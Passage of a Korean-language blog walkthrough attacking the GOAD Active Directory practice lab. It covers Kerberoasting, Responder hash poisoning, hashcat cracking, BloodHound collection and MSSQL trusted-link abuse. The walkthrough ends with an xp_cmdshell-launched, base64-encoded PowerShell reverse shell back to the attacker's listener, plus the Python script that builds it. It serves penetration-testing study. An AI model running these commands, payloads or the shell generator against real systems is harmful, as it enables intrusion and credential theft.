Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$a0fbad750dd4f43e2f8bc66d519bf0ac$199bcef071c5cd9350f8e807ab94708690dfc247559f592da010179eb5604d35aad1082ee7df32137f3f0d2d1b18b528216f1d524ddabb4cc4e1c8545c9b90f452a0faea6039b2dc5558858d47ea0d93533857a0184ff0d7c299c38bd4426517bc7eed2fea62714017f76eb6d3513eb14f20882a7819bda1864644038a35ccb226950c7e8784f6ed78a0286888b594efe7f505780cee55c60bfeebe11cf99d5acdb3f904a8424ddd05252216887841a7c8206ae5ef2b56abe0d447f63271da01aa5cac784979541d61f906b1f396c1ac14732ad6c8faee312e23b7c64fb2f818aaeb39c0a1374f99a4f4d446b4425e18cc8d93bfe920ea8b93c874b11f6588c59603a299be4329afafa47251c854d2e3979d97f223eaee0e2fb81f8a19b965eadf80a346ce2cb32e1aee1b9b51fa7c93ee0dc353816f846a0dda838bc5a088591e64a5cf665066f3ab5cb4a23a81530d59efd08a352aab3a8aa8b99f24b54d452a2d70f871bbb831a97a3bac7816d58e1e2faf253590f621601a12e89225516193b9d3357b62f7df58e5b9207a103a1ae3015fc0b8d8e5aff4c355264208f9bdd3eba851b0deffbae2c7329bb9729f317e4fde1a5e28aaf3e35bf1191dd3dd5c03fcb4ac1301afe3b6ca74e32e8b5402a8a15fa1254db381c6a2d28b92e57826137be780463ed72fd72acf0af66672df8a5d6e65e590d8ad660e75e8ed20dc0f83b29683e971f0d713ac6f0e3a01a5a89d9e85077849bd90b6865972537c71691a9d132a376178f7722fbe214e9a8a78989074a5e13ef0221f5cbbbc0926e0524f521ba373038743acdcefba66e3edc6f39086deda91b03a1a847f9b814505461ce07a0d71ae6aad0dd45819b1adffdfdb259ca07fe91bd16f172cedc9873ea01fe55e01bbbfc809ccdc19b678d9443eb5f2855f818503897f6e38a6b7c2fc16980e482e24fdfc22e3deb861c62e6035151257fd986e6f97fa4e3bebfe1d27680ed3cc4fcff763e9359ce56679c88cef12918e375d251fd1c76dc8cd52beda6a5b557c769ac247babead04933c7b2e6f6840addb329db7acbd36247daf9b0d7ddc1d18218303a8b129ea111a5f255b8a33022b0b42c8339f3df2318397116dd261300346831b5e35f48e4eca7abad2f2fe6b5d9b029a644c1d5aee1094880e083d989a01419e2784bc5b6b08325a74c9eadb93a0edcbe87f74aa702dc336aa456f59557a6e479f28047177fbc1a01da39bb7e4625a45044724eec1dd54e7488219c2e5514b1750a1d580165f9f1c1b5fe645c47021169f281d97834b8f2360e18562c8f3a5e0aef0657ffa52a4bc3b76b19771099e71b3c1328c09267fe309c000becda7b81dfad578cb5c58470e60d0ef897ff96e8efbadb18b3c4f272ac9cbe51d3b04cd835c962495e797c4593ad4609147b9fb1a456b37b9e5c353a15c835d79a7bacdafa16a2ef435e08ae63872f3df4fbf5216fcc29f3930ba986dbacd0c410f40900186cd9ff5b7c24ab9e0:iknownothing
impacket의 GetUserSPNs를 통하여 Kerberoating을 진행하는것을
netexec ldap '192.168.56.12' -u 'north.sevenkingdoms.local\samwell.tarly' -p 'Heartsbane' --kerberoasting커멘드로 동일한 결과를 가져올 수 있다.
Responder
특정 네트워크에서 유효한 계정을 획득하지 못했을 경우 네트워크 인터페이스를 모니터링하면서 NTLM 해시를 탈취하는 방법으로 Responder를 사용할 수 있다. Responder를 실행하고 일정 시간이 지나면 아래와 같이 각각 NORTH\robb.stark, NORTH\eddard.stark 계정으로 Bravos, Meren에 SMB 연결을 시도하는것을 스니핑할 수 있다.
실제로 Bravos와 Meren 호스트는 존재하지 않는다. 다만 Braavos와 Meereen 호스트는 존재한다. 이렇게 Windows에서는 DNS 조회가 실패했을 경우 로컬 호스트 확인을 위해 LLMNR(Link-Local Multicast Name Resolution)을 사용하는데 이때 NTLM 해시를 탈취할 수 있다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(root㉿kali)-[~/Desktop/GOAD/kerberoasting]
└─# responder -I eth1
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
...
...
...
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name BRAVOS (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Bravos.local
[*] [LLMNR] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Bravos
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[*] [LLMNR] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Bravos
[*] [MDNS] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Bravos.local
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[SMB] NTLMv2-SSP Client : fe80::a4b3:158:af4f:d85a
[SMB] NTLMv2-SSP Username : NORTH\robb.stark
[SMB] NTLMv2-SSP Hash : robb.stark::NORTH:a7dfb147661e0038:D14DCAFA720A1538E2C79C6908C788AD:01010000000000000093C6844D43DA0197E5F5800421872E0000000002000800470052004300520001001E00570049004E002D005A005100540055005900410036004D0051005A00530004003400570049004E002D005A005100540055005900410036004D0051005A0053002E0047005200430052002E004C004F00430041004C000300140047005200430052002E004C004F00430041004C000500140047005200430052002E004C004F00430041004C00070008000093C6844D43DA010600040002000000080030003000000000000000000000000030000055AC13CE2222CE56F5C5659DD582EA3F1A4641C9E58261EFB8DC8B728F0653460A001000000000000000000000000000000000000900160063006900660073002F0042007200610076006F0073000000000000000000
...
...
...
[*] [LLMNR] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Meren
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Meren.local
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name MEREN (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[*] [MDNS] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Meren
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[SMB] NTLMv2-SSP Client : fe80::a4b3:158:af4f:d85a
[SMB] NTLMv2-SSP Username : NORTH\eddard.stark
[SMB] NTLMv2-SSP Hash : eddard.stark::NORTH:2e05ff37b12c53f3:4AA861E5CA5872F9E084A0A31DDFF236:01010000000000000093C6844D43DA018BFFDB799D251EEA0000000002000800470052004300520001001E00570049004E002D005A005100540055005900410036004D0051005A00530004003400570049004E002D005A005100540055005900410036004D0051005A0053002E0047005200430052002E004C004F00430041004C000300140047005200430052002E004C004F00430041004C000500140047005200430052002E004C004F00430041004C00070008000093C6844D43DA010600040002000000080030003000000000000000000000000030000055AC13CE2222CE56F5C5659DD582EA3F1A4641C9E58261EFB8DC8B728F0653460A001000000000000000000000000000000000000900140063006900660073002F004D006500720065006E000000000000000000
탈취한 두 NTLMv2 해시를 hashcat으로 크랙 시도할 경우 robb.stark의 NTLMv2가 크랙되어 패스워드를 확인할 수 있었다. 하지만 eddard.stark의 패스워드는 크랙할 수 없었다. 이렇게 다섯번째 계정까지 탈취할 수 있었다.
- north.sevenkingdoms.local\samwell.tarly:Heartsbane (User Description)
- north.sevenkingdoms.local\hodor:hodor (Password Splay)
- north.sevenkingdoms.local\brandon.stark:iseedeadpeople (AS-REP Roasting)
- north.sevenkingdoms.local\jon.snow:iknownothing (Kerberoasting)
- north.sevenkingdoms.local\jrobb.stark:sexywolfy (Responder)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
┌──(root㉿kali)-[~/Desktop/GOAD]
└─# hashcat -m 5600 -a 0 ntlmv2.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-12th Gen Intel(R) Core(TM) i9-12900KF, 2914/5892 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
ROBB.STARK::NORTH:a7dfb147661e0038:d14dcafa720a1538e2c79c6908c788ad:01010000000000000093c6844d43da0197e5f5800421872e0000000002000800470052004300520001001e00570049004e002d005a005100540055005900410036004d0051005a00530004003400570049004e002d005a005100540055005900410036004d0051005a0053002e0047005200430052002e004c004f00430041004c000300140047005200430052002e004c004f00430041004c000500140047005200430052002e004c004f00430041004c00070008000093c6844d43da010600040002000000080030003000000000000000000000000030000055ac13ce2222ce56f5c5659dd582ea3f1a4641c9e58261efb8dc8b728f0653460a001000000000000000000000000000000000000900160063006900660073002f0042007200610076006f0073000000000000000000:sexywolfy
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ntlmv2.txt
Time.Started.....: Tue Jan 9 22:59:38 2024 (34 secs)
Time.Estimated...: Tue Jan 9 23:00:12 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 539.7 kH/s (0.72ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/2 (50.00%) Digests (total), 1/2 (50.00%) Digests (new), 1/2 (50.00%) Salts
Progress.........: 28688770/28688770 (100.00%)
Rejected.........: 0/28688770 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 80%
Started: Tue Jan 9 22:59:37 2024
Stopped: Tue Jan 9 23:00:14 2024
BloodHound
지금까지 총 5개의 유효한 계정을 확보할 수 있었다. 이제 BloodHound를 통해 전체 AD 구조를 파악하기위해서 로드할 정보를 수집해야한다. 이때 bloodhound-python을 통해서 총 3개의 도메인에 대한 정보를 수집할 수 있다.
sevenkingdoms.local
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~/Desktop/GOAD/BloodHound]
└─# bloodhound-python -d 'sevenkingdoms.local' -u 'samwell.tarly@north.sevenkingdoms.local' -p 'Heartsbane' -dc 'kingslanding.sevenkingdoms.local' -ns '192.168.56.10' -c All --zip
INFO: Found AD domain: sevenkingdoms.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 16 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 9 ous
INFO: Found 19 containers
INFO: Found 2 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: kingslanding.sevenkingdoms.local
INFO: Done in 00M 01S
INFO: Compressing output into 20240109204632_bloodhound.zip
north.sevenkingdoms.local
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[~/Desktop/GOAD/BloodHound]
└─# bloodhound-python -d 'north.sevenkingdoms.local' -u 'samwell.tarly@north.sevenkingdoms.local' -p 'Heartsbane' -dc 'winterfell.north.sevenkingdoms.local' -ns '192.168.56.11' -c All --zip
INFO: Found AD domain: north.sevenkingdoms.local
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 17 users
INFO: Found 51 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: castelblack.north.sevenkingdoms.local
INFO: Querying computer: winterfell.north.sevenkingdoms.local
INFO: Done in 00M 01S
INFO: Compressing output into 20240109204815_bloodhound.zip
essos.local
essos.local 도메인 대상으로 bloodhound-python을 실행하면 아래와 같은 에러가 발생한다. 찾아보니 시간 동기화 문제같다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~/Desktop/GOAD/BloodHound]
└─# bloodhound-python -d 'essos.local' -u 'samwell.tarly@north.sevenkingdoms.local' -p 'Heartsbane' -dc 'meereen.essos.local' -ns '192.168.56.12' -c All --zip
INFO: Found AD domain: essos.local
INFO: Getting TGT for user
Traceback (most recent call last):
File "/usr/bin/bloodhound-python", line 33, in <module>
sys.exit(load_entry_point('bloodhound==1.6.1', 'console_scripts', 'bloodhound-python')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/bloodhound/__init__.py", line 332, in main
auth.get_tgt()
File "/usr/lib/python3/dist-packages/bloodhound/ad/authentication.py", line 214, in get_tgt
tgs, cipher, _, sessionkey = getKerberosTGS(servername, self.domain, self.kdc,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20231106.134307.9aa93730-py3.11.egg/impacket/krb5/kerberosv5.py", line 447, in getKerberosTGS
r = sendReceive(message, domain, kdcHost)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20231106.134307.9aa93730-py3.11.egg/impacket/krb5/kerberosv5.py", line 91, in sendReceive
raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KRB_AP_ERR_BAD_INTEGRITY(Integrity check on decrypted field failed)
여러 시행착오를 거치며 bloodhound-python의 버전을 업그레이드하는 방법으로 해결하였다. 기존에 사용하던 버전은 1.7.0이였으며 pip3 install bloodhound --upgrade 커멘드를 통해 업그레이드한 bloodhound-python의 버전은 1.7.2이다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/Desktop/GOAD/BloodHound]
└─# bloodhound-python -d 'essos.local' -u 'brandon.stark@north.sevenkingdoms.local' -p 'iseedeadpeople' -dc 'meereen.essos.local' -ns '192.168.56.12' -c All --zip
INFO: Found AD domain: essos.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: braavos.essos.local
INFO: Querying computer: meereen.essos.local
INFO: Done in 00M 00S
INFO: Compressing output into 20240109214455_bloodhound.zip
castelblack.north.sevenkingdoms.local (192.168.56.22)
MSSQL - Trusted links
이전 포스팅에서 포트 스캔을 통해 CASTELBLACK 호스트에는 MSSQL(1433/tcp)가 서비스되고 있는것을 확인할 수 있었다. 아래와 같이 netexec를 통해서도 확인할 수 있었다.
1
2
3
┌──(root㉿kali)-[~/Desktop/GOAD]
└─# netexec mssql '192.168.56.22'
MSSQL 192.168.56.22 1433 CASTELBLACK [*] Windows 10.0 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
이제 위에서 확보한 5개의 계정이 해당 MSSQL로 접근 가능한지 여부를 파악하기위해 아래와 같은 커멘드를 통해 확인해 볼 수 있었으며, 확보한 모든 사용자가 인증이 가능하지만 그중 로컬 관리자 접근이 가능한것으로 파악되는 jon.snow 계정을 확인할 수 있다(Pwn3d!)
1
2
3
4
5
6
7
┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# crackmapexec mssql '192.168.56.22' -u pwn-users.txt -p pwn-passwords.txt --no-bruteforce --continue-on-success
MSSQL 192.168.56.22 1433 CASTELBLACK [*] Windows 10.0 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
MSSQL 192.168.56.22 1433 CASTELBLACK [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
MSSQL 192.168.56.22 1433 CASTELBLACK [+] north.sevenkingdoms.local\hodor:hodor
MSSQL 192.168.56.22 1433 CASTELBLACK [+] north.sevenkingdoms.local\brandon.stark:iseedeadpeople
MSSQL 192.168.56.22 1433 CASTELBLACK [+] north.sevenkingdoms.local\jon.snow:iknownothing (Pwn3d!)
impacket의 mssqlclient를 이용하여 jon.snow 계정으로 MSSQL에 접근할 수 있다. MSSQL 데이터베이스를 열거하니 기본적으로 존재하는 DB만 확인된다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kali)-[~/Desktop/GOAD/Vuln/MSSQL-Trusted-Links]
└─# impacket-mssqlclient 'north.sevenkingdoms.local/jon.snow:iknownothing@192.168.56.22' -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (NORTH\jon.snow dbo@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
enum_logins 명령을 실행하면 아래와 같은 쿼리가 실행되며, 로그인한 jon.snow 계정은 sysadmin임을 확인할 수 있다.
1
2
3
4
5
select r.name,r.type_desc,r.is_disabled, sl.sysadmin, sl.securityadmin,
sl.serveradmin, sl.setupadmin, sl.processadmin, sl.diskadmin, sl.dbcreator, sl.bulkadmin
from master.sys.server_principals r
left join master.sys.syslogins sl on sl.sid = r.sid
where r.type in ('S','E','X','U','G')
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
SQL (NORTH\jon.snow dbo@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
---------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 0 1 0 0 0 0 0 0 0
##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0
NORTH\sql_svc WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NT SERVICE\MSSQL$SQLEXPRESS WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
CASTELBLACK\vagrant WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
BUILTIN\Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0
NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NT SERVICE\SQLTELEMETRY$SQLEXPRESS WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NORTH\jon.snow WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0
NORTH\samwell.tarly WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
NORTH\brandon.stark WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0
enum_links 명령을 실행하면 MSSQL의 Trusted Links를 확인할 수 있다. 해당 커멘드는 아래와 같은 쿼리를 실행한다.
1
2
EXEC sp_linkedservers
EXEC sp_helplinkedsrvlogin
신뢰할 수 있는 링크를 확인하면 essos.local 도메인에 속한 BRAAVOS의 MSSQL과 링크가 연결되어있으며 jon.snow 계정과 sa 계정가 매핑되어있는 것도 확인할 수 있다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
SQL (NORTH\jon.snow dbo@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
---------------------- ---------------- ----------- ---------------------- ------------------ ------------ -------
BRAAVOS SQLNCLI braavos.essos.local NULL NULL NULL
CASTELBLACK\SQLEXPRESS SQLNCLI SQL Server CASTELBLACK\SQLEXPRESS NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
---------------------- -------------- --------------- ------------
BRAAVOS NULL 1 NULL
BRAAVOS NORTH\jon.snow 0 sa
CASTELBLACK\SQLEXPRESS NULL 1 NULL
우리는 현재 jon.snow 계정으로 CASTELBLACK(192.168.56.22)의 MSSQL에 접근해 있으며 위 링크를 이용하여 BRAAVOS(192.168.56.23)링크를 사용하여 braavos.essos.local에 SQL 쿼리를 실행하거나 OS 명령을 실행할 수 있다.
아래와 같이 use_link 명령을 통해 실제로 아래와 같은 쿼리를 실행하고 BRAAVOS에 연결 후 xp_cmdshell 저장 프로시저를 이용하여 OS 명령을 실핼할 수 있었다.
1
2
3
EXEC ('select system_user as "username"') AT BRAAVOS
EXEC ('exec master.dbo.sp_configure ''show advanced options'',1;RECONFIGURE;exec master.dbo.sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT BRAAVOS
EXEC ('exec master..xp_cmdshell ''whoami''') AT BRAAVOS
링크를 사용하여 명령을 실행할 경우 essos.local/sql_svc 권한으로 명령이 실행되는 것을 확인할 수 있다.
1
2
3
4
5
SQL (NORTH\jon.snow dbo@master)> use_link BRAAVOS
SQL >BRAAVOS (sa dbo@master)> xp_cmdshell whoami
output
-------------
essos\sql_svc
이후 아래 코드를 사용하여 powershell을 통한 리버스 커넥션을 맺는 커멘드를 제작할 수 있다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python
import base64
import sys
if len(sys.argv) < 3:
print('usage : %s ip port' % sys.argv[0])
sys.exit(0)
payload="""
$c = New-Object System.Net.Sockets.TCPClient('%s',%s);
$s = $c.GetStream();[byte[]]$b = 0..65535|%%{0};
while(($i = $s.Read($b, 0, $b.Length)) -ne 0){
$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);
$sb = (iex $d 2>&1 | Out-String );
$sb = ([text.encoding]::ASCII).GetBytes($sb + 'ps> ');
$s.Write($sb,0,$sb.Length);
$s.Flush()
};
$c.Close()
""" % (sys.argv[1], sys.argv[2])
byte = payload.encode('utf-16-le')
b64 = base64.b64encode(byte)
print("powershell -exec bypass -enc %s" % b64.decode())
생성된 리버스 커넥션 명령을 xm_cmdshell을 통해 전달할 경우 공격자가 리스닝하고있는 포트로 powershell이 바인딩되는 것을 확인할 수 있다.
1
SQL >BRAAVOS (sa dbo@master)> xp_cmdshell powershell -exec bypass -enc CgAkAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAnADEAOQAyAC4AMQA2ADgALgA1ADYALgAzADEAJwAsADMAMAAwADAAMAApADsACgAkAHMAIAA9ACAAJABjAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsACgB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMALgBSAGUAYQBkACgAJABiACwAIAAwACwAIAAkAGIALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7AAoAIAAgACAAIAAkAGQAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgAsADAALAAgACQAaQApADsACgAgACAAIAAgACQAcwBiACAAPQAgACgAaQBlAHgAIAAkAGQAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsACgAgACAAIAAgACQAcwBiACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGIAIAArACAAJwBwAHMAPgAgACcAKQA7AAoAIAAgACAAIAAkAHMALgBXAHIAaQB0AGUAKAAkAHMAYgAsADAALAAkAHMAYgAuAEwAZQBuAGcAdABoACkAOwAKACAAIAAgACAAJABzAC4ARgBsAHUAcwBoACgAKQAKAH0AOwAKACQAYwAuAEMAbABvAHMAZQAoACkACgA=
1
2
3
4
5
6
┌──(root㉿kali)-[~/Desktop/GOAD/Vuln/MSSQL-Trusted-Links]
└─# nc -lvnp 30000
listening on [any] 30000 ...
connect to [192.168.56.31] from (UNKNOWN) [192.168.56.23] 58245
whoami
essos\sql_svc
이렇게 north.sevenkingdoms.local 도메인에서 5개의 계정을 확보할 수 있었고, essos.local 도메인에서 sql_svc의 쉘을 확보할 수 있었다. 이번 포스팅은 여기서 마무리한다 :)
This post is licensed under CC BY 4.0 by the author.